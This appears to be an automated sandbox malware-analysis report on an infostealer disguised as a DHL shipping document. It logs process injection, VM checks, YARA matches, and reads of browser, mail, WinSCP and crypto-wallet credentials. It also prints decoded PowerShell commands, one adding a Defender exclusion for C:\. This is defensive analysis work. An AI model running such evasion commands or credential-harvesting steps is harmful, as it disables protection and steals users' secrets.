                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97732
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97625
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97508
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97390
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeThread delayed: delay time: 97264
                  Source: C:\Users\user\AppData\Local\explorers.exeThread delayed: delay time: 922337203685477
                  Source: InstallUtil.exe, 00000011.00000002.556971719.00000294206D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: KbWSe.exe, 00000013.00000003.479323373.0000000000891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                  Source: InstallUtil.exe, 00000011.00000002.556971719.00000294206D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware4X7R9VV9Win32_VideoController66XGVD9WVideoController120060621000000.000000-00014.85187display.infMSBDA328S4PUGPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsVV92AOMP
                  Source: Lutyzivrgpnlssvvvftlfile.exe, 0000000F.00000002.545974916.0000000000694000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.556971719.00000294206D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 400000
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 402000
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 4C4000
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: E7A101B010
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: Base64 decoded start-sleep -seconds 10
                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: Base64 decoded start-sleep -seconds 10
                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeThread register set: target process: 1764
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe "C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe"
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Users\user\Desktop\DHL_Shipping_Document2.exe VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Users\user\AppData\Local\explorers.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Users\user\AppData\Local\explorers.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\explorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL_Shipping_Document2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeCode function: 15_2_022DF6E0 GetUserNameW,

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Lutyzivrgpnlssvvvftlfile.exe PID: 5084, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5916, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 2948, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: InstallUtil.exe, 00000011.00000002.550292879.00000294081A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: InstallUtil.exe, 00000011.00000002.550292879.00000294081A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: InstallUtil.exe, 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: DHL_Shipping_Document2.exe, 00000000.00000002.406089795.000001991C12E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: Yara matchFile source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.550292879.0000029407DCA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Lutyzivrgpnlssvvvftlfile.exe PID: 5084, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1764, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 5916, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: KbWSe.exe PID: 2948, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1990bb43928.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bf4df80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991befdf48.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL_Shipping_Document2.exe.1991bed5f10.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000002.556924562.00000000023AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.555838851.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.558518953.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Lutyzivrgpnlssvvvftlfile.exe PID: 5084, type: MEMORYSTR
